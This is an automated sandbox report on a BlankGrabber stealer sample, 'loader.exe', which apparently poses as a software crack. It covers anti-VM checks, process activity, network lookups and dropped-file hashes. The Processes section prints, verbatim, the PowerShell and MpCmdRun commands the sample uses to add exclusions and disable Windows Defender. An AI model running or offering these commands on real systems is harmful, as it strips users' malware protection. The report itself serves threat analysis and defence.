Malware Analysis Report

2024-10-10 08:30

Sample ID 240619-3fe2yawgrd
Target loader.exe
SHA256 a5449049022450ee54e4ef25e216f81adfc6e65f8b88b92f097145c29e092424
Tags
blankgrabber evasion execution themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a5449049022450ee54e4ef25e216f81adfc6e65f8b88b92f097145c29e092424

Threat Level: Known bad

The file loader.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber evasion execution themida trojan upx

Blankgrabber family

Deletes Windows Defender Definitions

A stealer written in Python and packaged with Pyinstaller

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Checks BIOS information in registry

Executes dropped EXE

Loads dropped DLL

Themida packer

UPX packed file

Checks whether UAC is enabled

Enumerates physical storage devices

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-19 23:27

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 23:27

Reported

2024-06-19 23:58

Platform

win10-20240404-en

Max time kernel

516s

Max time network

1608s

Command Line

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3164 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Users\Admin\AppData\Local\Temp\loader.exe
PID 3164 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Users\Admin\AppData\Local\Temp\loader.exe
PID 592 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 3472 wrote to memory of 3188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3472 wrote to memory of 3188 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 592 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\system32\cmd.exe
PID 200 wrote to memory of 1352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 200 wrote to memory of 1352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4728 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4728 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2776 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2776 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4420 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4420 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 1920 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 2640 wrote to memory of 4996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2640 wrote to memory of 4996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 5112 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe
PID 5112 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe
PID 200 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe
PID 200 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe

Processes

C:\Users\Admin\AppData\Local\Temp\loader.exe

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

C:\Users\Admin\AppData\Local\Temp\loader.exe

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()"

C:\Users\Admin\AppData\Local\Temp\onefile_5112_133633132949966072\loader.exe

bound.exe

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Network

Country Destination Domain Proto
US 8.8.8.8:53 blank-jyhmj.in udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI31642\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

\Users\Admin\AppData\Local\Temp\_MEI31642\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/592-30-0x00007FFF9D630000-0x00007FFF9DC19000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31642\base_library.zip

MD5 32ede00817b1d74ce945dcd1e8505ad0
SHA1 51b5390db339feeed89bffca925896aff49c63fb
SHA256 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512 a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_ctypes.pyd

MD5 00f75daaa7f8a897f2a330e00fad78ac
SHA1 44aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA256 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512 f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

memory/592-35-0x00007FFFA15A0000-0x00007FFFA15C3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31642\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI31642\bound.blank

MD5 7705111a97e722d4bb4a0b91d8a6b55f
SHA1 474b52afdd55503fb2f3c2ca7c53824e8785ede8
SHA256 6c2330df293aaff501678a9783b4b8886368cb6011465b4256bfbed4c82ea224
SHA512 c096914345acc01859d0fb03d9c2f2f215d189ec6854987e349d434f80eeccfbd71fddaeef093deda560b48c1b0fedabdd560e1e1c80c4761a9557dddba343a4

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

memory/592-54-0x00007FFFA2620000-0x00007FFFA262F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_decimal.pyd

MD5 e3fb8bf23d857b1eb860923ccc47baa5
SHA1 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0
SHA256 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3
SHA512 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

C:\Users\Admin\AppData\Local\Temp\_MEI31642\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

C:\Users\Admin\AppData\Local\Temp\_MEI31642\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

C:\Users\Admin\AppData\Local\Temp\_MEI31642\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

C:\Users\Admin\AppData\Local\Temp\_MEI31642\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

C:\Users\Admin\AppData\Local\Temp\_MEI31642\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI31642\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI31642\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

C:\Users\Admin\AppData\Local\Temp\_MEI31642\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
